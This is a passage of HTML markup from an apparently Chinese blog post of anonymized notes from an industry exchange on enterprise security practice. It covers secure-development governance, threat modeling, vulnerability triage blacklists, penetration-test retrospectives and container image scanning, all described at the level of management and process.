0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;margin-bottom: 0px;"><span leaf="">头部企业的探针、规则、数据规模是普通企业的10倍以上，数字化水平远超想象。我用数字孪生方法做安全研发，网络安全与软件产业数字化、软件数字孪生本就同源同体。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;margin-bottom: 0px;"><span leaf="">从数字化这个角度看，<span textstyle="" style="color: rgb(255, 0, 0);">安全本质是构建数字世界完整认知</span>，表面上包括应用、数据或攻防等安全，更核心的诉求是通过全域感知、精准建模，帮助企业<span textstyle="" style="color: rgb(255, 0, 0);">真正理解和掌控自己的数字世界</span>。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;margin-bottom: 0px;"><span leaf="">在数字化浪潮中，近水楼台先得月，当安全与数字化深度融合，<span textstyle="" style="color: rgb(255, 0, 0);">将安全定位为认知数字世界设计形态、制造形态、运行形态的基础设施</span>，而不仅仅是防护手段，这种视角转变可能会带来新的机会和方向，或许可以释放巨大的创新潜能，<span textstyle="" style="color: rgb(255, 0, 0);">Security is eating the world</span>， 加油！一切皆有可能！</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;margin-bottom: 0px;"><span leaf=""><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 16px;">预祝同仁在新的一年：</span></span><span style="color:#FA0000;"><span leaf=""><span textstyle="" style="font-size: 16px;">福慧祥和，法喜充满。</span></span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 12pt;margin-bottom: 0px;"><span leaf=""><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 12pt;margin-bottom: 0px;"><span leaf="">---</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><span leaf=""><span textstyle="" style="font-size: 12px;">接下来的内容是交流笔记，当日信息量太大，本人水平有限，错误疏漏、移花接木难免，请多包涵。</span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><span leaf=""><span textstyle="" style="font-size: 12px;">全文无图，师者匿名，非研发及安全人士请直接绕行。</span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 14pt;color: rgb(39, 98, 150);margin-bottom: 0px;"><span leaf="" style="font-weight: bold;"><span textstyle="" style="font-size: 22px;font-weight: normal;">三、实践参考：创新团队的具体实践</span></span></p><table style="direction:ltr;border-collapse:collapse;border-style:solid;border-color:#A3A3A3;border-width:
 0pt;"><tbody><tr><td valign="top" style="border-width:0pt;vertical-align:top;width:2.9819in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;Microsoft YaHei&#34;;font-size:20.0pt;"><span style="font-weight:bold;"><span leaf=""><span textstyle="" style="font-size: 20px;">笔记目录</span></span></span></p></td></tr><tr><td valign="top" style="border-width:0pt;vertical-align:top;width:3.0513in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;"> </span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span style="font-family:Calibri;" lang="zh-CN"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">- </span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">开门见山：领导的安全思维方式</span></span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span style="font-family:Calibri;" lang="zh-CN"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">- </span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">主题</span></span></span><span style="font-family:Calibri;" lang="en-US"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">1</span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">：开发安全</span></span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span style="font-family:Calibri;" lang="zh-CN"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">    - </span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">安全和项目长在一起</span></span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span style="font-family:Calibri;" lang="zh-CN"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">    - </span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">开发安全赋能平台</span></span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span style="font-family:Calibri;" lang="zh-CN"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">    - </span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">渗透测试</span></span></span><span style="font-family:Calibri;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;"> </span></span></span><span style="font-family:
  Calibri;" lang="en-US"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;"> </span></span></span><span style="font-family:Calibri;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">  </span></span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span style="font-family:Calibri;" lang="zh-CN"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">    - </span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">开源及容器安全</span></span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span style="font-family:Calibri;" lang="zh-CN"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">    - </span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">应用攻击面系统</span></span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span style="font-family:Calibri;" lang="zh-CN"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">- </span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">主题</span></span></span><span style="font-family:Calibri;" lang="en-US"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">2</span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">：安全攻防</span></span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span style="font-family:Calibri;" lang="zh-CN"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">    - </span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">优先事项：精细化运营</span></span></span><span style="font-family:Calibri;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;"> </span></span></span><span style="font-family:
  Calibri;" lang="en-US"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">+</span></span></span><span style="font-family:Calibri;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;"> </span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">自研能力提升</span></span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span style="font-family:Calibri;" lang="zh-CN"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">    - </span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">数据计算：探针数据化，能力规则化</span></span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span style="font-family:Calibri;" lang="zh-CN"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">    - </span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">厂商可辅助，但不能依赖</span></span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span style="font-family:Calibri;" lang="zh-CN"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">    - </span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">守住关键：朴素的防护原则</span></span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span style="font-family:Calibri;" lang="zh-CN"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">- </span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">主题</span></span></span><span style="font-family:Calibri;" lang="en-US"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">3</span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">：数据安全</span></span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span style="font-family:Calibri;" lang="zh-CN"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">    - </span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">数据安全实践的核心逻辑</span></span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span style="font-family:Calibri;" lang="zh-CN"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">    - </span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">具体数据安全能力建设</span></span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span style="font-family:Calibri;" lang="zh-CN"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">    - </span></span></span><span style="font-family:Calibri;" lang="en-US"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">LLM:</span></span></span><span style="font-family:
  Calibri;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;"> </span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;">从攻防、应用安全看数据安全</span></span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: normal;"> </span></span></p></td></tr></tbody></table><h1 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;"><span leaf=""><span textstyle="" style="font-weight: bold;">开门见山：领导的安全思维方式</span></span></h1><p style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;margin-bottom: 0px;margin-top: 16px;"><span leaf="">领导开场简短，偶有点评，如切如磋，非常到位：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-weight:bold;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">关于交流</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:
     12.0pt;color:black;"><span leaf="">：行业内多交流是高价值的。</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:red;"><span leaf="">即便是交流时大家讲的段子、大白话、同行事件，也可以成为汇报中生动简洁的例子</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">，让决策者更容易理解和记住关键信息。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-weight:bold;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">关于标准</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:
     12.0pt;color:black;"><span leaf="">：</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:red;"><span leaf="">安全不是标准化的</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">，不是“应该是那样、必须是那样”；是结合每个公司内安全实际的话语权、地位、投入、IT系统建设和部署等综合考虑的；</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-weight:bold;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">关于安全</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:
     12.0pt;color:black;"><span leaf="">：安全是结合公司现状的当前实践，涉及团队整合、能力协作乃至办公场地相关的问题，</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:red;"><span leaf="">是实打实的东西</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">。</span></span><span style="font-family:宋体;font-size:12.0pt;color:black;"><span leaf="">    </span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-weight:bold;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">关于能力</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:
     12.0pt;color:black;"><span leaf="">：没有一个产品能解决所有问题，</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:red;"><span leaf="">安全只能说是能力的混搭</span></span><span style="font-family:
     &#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">。更多的需要试探、感知、响应，在实践、复盘过程中，涌现新实践。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-weight:bold;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">关于环境</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:
     12.0pt;color:black;"><span leaf="">：需求是底层逻辑，安全的组织逻辑从属于大框架和大架构，团队设置、人员规模、预算、乃至暴露面收缩，是框架内、平台上思维，而</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:red;"><span leaf="">不是当事人视角</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">。</span></span></li></ul><h1 style="margin:0in;font-size:16.0pt;color:#1E4E79;"><span style="font-family:
微软雅黑;"><span leaf=""><br/></span></span></h1><h1 style="margin:0in;font-size:16.0pt;color:#1E4E79;"><span style="font-family:
微软雅黑;"><span leaf="">主题</span></span><span style="font-family:Calibri;"><span leaf="">1</span></span><span style="font-family:微软雅黑;"><span leaf="">：开发安全</span></span></h1><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;"><span style="color:
black;"><span leaf="">感受：</span></span><span style="color:red;"><span leaf="">开发安全、内生安全，是“生”、“养”的能力</span></span><span style="color:black;"><span leaf="">，需要长周期才能形成。Common Criteria甚深，浅尝辄止、半途而废、一锤子买卖的居多，如此研用，做成平台，持续赋能，构建符合高标准安全要求的产品，确属罕见。</span></span></p><p style="font-family: 微软雅黑;font-size: 12pt;color: black;margin-top: 0px;margin-bottom: 0px;"><span leaf="">要点：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">开发安全或应用安全，业界从业人员、技术大会、参考资料都比较少，需要有框架来思考、规划自己怎么做。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">做到一定程度，工具、平台、技术规范、流程都建立之后，强调精细化运营，</span></span><span style="font-family:微软雅黑;font-size:12.0pt;color:red;"><span leaf="">每个点都要深度运营</span></span><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">安全产品自研，策略上可能和领导偏好有关系；一线工作中，满足自己需求，要很大的定制化，</span></span><span style="font-family:微软雅黑;font-size:12.0pt;color:red;"><span leaf="">自研可能是最快最有效果的途径，有大量需求</span></span></li></ul><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;"><span leaf=""><br/></span></h2><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;"><span leaf="">安全和项目长在一起</span></h2><p style="font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;margin-top: 16px;"><span leaf="">人员配合：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">专业安全人员，作为安全顾问，负责几个中心的需求、设计、测试等节点的全周期安全咨询、安全架构设计、安全评估。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">项目组内的安全对接人员，作为安全BP。要经过安全培训，通过安全考试，能使用安全平台。能</span></span><span style="font-family:微软雅黑;font-size:12.0pt;color:red;"><span leaf="">画出部署图，是一个门槛</span></span><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">。</span></span><span style="font-family:宋体;font-size:12.0pt;color:black;"><span leaf="">    </span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">架构师分两层，中心架构师和应用架构师。会有中心架构师审核通过，但是架构被安全打回去的情况，所以安全要提前加入到架构评审环节。 </span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">架构委员会是个实体组织</span></span></li></ul><p style="font-family: 微软雅黑;font-size: 12pt;color: black;"><span leaf=""><br/></span></p><p style="font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">制度：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">发布开发安全指引，明确卡点，角色职责，安全实践，尤其是业务强相关的流程。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">业务部门自己买saas，应用系统直接在互联网，上线要评估，如有高风险，要业务领导签发。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">对于自研系统的残余高风险，上线需要业、技部门双领导签发，业务部门一般不会和技术部门一起签发自研系统的风险。</span></span></li></ul><p style="font-family: 微软雅黑;font-size: 12pt;color: black;"><span leaf=""><br/></span></p><p style="font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">开发安全的工具链：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">安全工具链已经建好，每个工具都在更新</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">工具链很多是集成，能自动化就自动化、</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">建立了安全自动化测试平台，可以进行自动化编排</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">形成了安全测试工具集群</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">自研开发安全赋能平台（单独介绍）</span></span></li></ul><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;"><span leaf=""><br/></span></h2><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;"><span leaf="">开发安全赋能平台</span></h2><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;"><span style="color:
black;"><span leaf="">新应用及应用系统重大变更，</span></span><span style="color:red;"><span leaf="">须获得剩余风险报告才可上线</span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;"><span leaf="">在线系统每年至少完成一次安全评估</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;"><span leaf="">项目启动第一时间就在平台内建系统，平台自动生成任务单</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 12pt;margin-bottom: 0px;"><span style="font-family:微软雅黑;color:black;"><span leaf="">安全问卷：</span></span><span style="font-family:宋体;"><span leaf="">    </span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">安全调查问卷的重点是画出部署图，图不是上传的，是在平台上画，图要精确，威胁建模才能数图联动，后续步骤才能自动化。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">坚持“费时费力”的部署图。部署图比清单、文字说明更直观，体现用户场景，架构师会审核看是否合理，进而明确安全控制。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">有标准化的部署图可以复用</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">提供了标准化安全架构，是很重要的卡点</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">每天有一半时间，在做安全评估</span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;"><span leaf=""><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">威胁建模：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">开发安全需求分类编号，包含需求来源、理由、目标、内容和最佳实践</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">威胁建模生成安全需求清单，并跟踪至关闭</span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;"><span leaf=""><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">安全测试：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span leaf="">CVE</span></span><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">、可达性、可利用性误报较多。自己制定的黑名单才是真正标准</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">源代码、组件有自己定制的黑名单，进入黑名单是一定要修复，其他直接放过去。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">源代码扫描也有误报，也有黑名单，列入黑名单的，才必要修。 </span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">（</span></span><span style="font-family:微软雅黑;font-size:12.0pt;color:red;"><span leaf="">精准的黑名单，真体现责任心</span></span><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">）</span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;"><span leaf=""><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">生产验证：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">安全套件、应用风险、生产漏洞验证</span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;"><span leaf=""><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">评估报告：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">安全</span></span><span style="font-family:
     &#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span leaf="">BP</span></span><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">发起审核，安全顾问提供审核意见</span></span><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf=""><br/></span></span></li></ul><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
微软雅黑;"><span leaf=""><br/></span></span></h2><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
微软雅黑;"><span leaf="">渗透测试</span></span><span style="font-family:&#34;Microsoft YaHei&#34;;"><span leaf="">   </span></span></h2><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;"><span leaf="">测试人员交叉验证，防止测试疲软。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">以史为鉴，及时复盘：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">如果发现越权的多，就要在前期进行沉淀和整改</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">设计缺陷，提供解决方案</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">安全编码培训课程，有考试，让外包进行培训（</span></span><span style="font-family:微软雅黑;font-size:12.0pt;color:red;"><span leaf="">宰相家丁知府职！</span></span><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">）</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">自己写安全案例库，如短信验证码不失效等问题</span></span></li></ul><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;"><span leaf=""><br/></span></h2><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;"><span leaf="">开源及容器安全</span></h2><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;"><span leaf="">外部引入的容器镜像，需要扫描，修复漏洞后才能入库、上线。有大厂提供的容器，被扫除1000+漏洞，修复后才上线。</span></p></li><li><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;"><span leaf="">自研的容器镜像，主要做好基础镜像的安全</span></p></li></ul><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;"><span leaf=""><br/></span></h2><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;"><span leaf="">应用攻击面系统</span></h2><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="margin-right: 0in;margin-left: 0in;font-family: 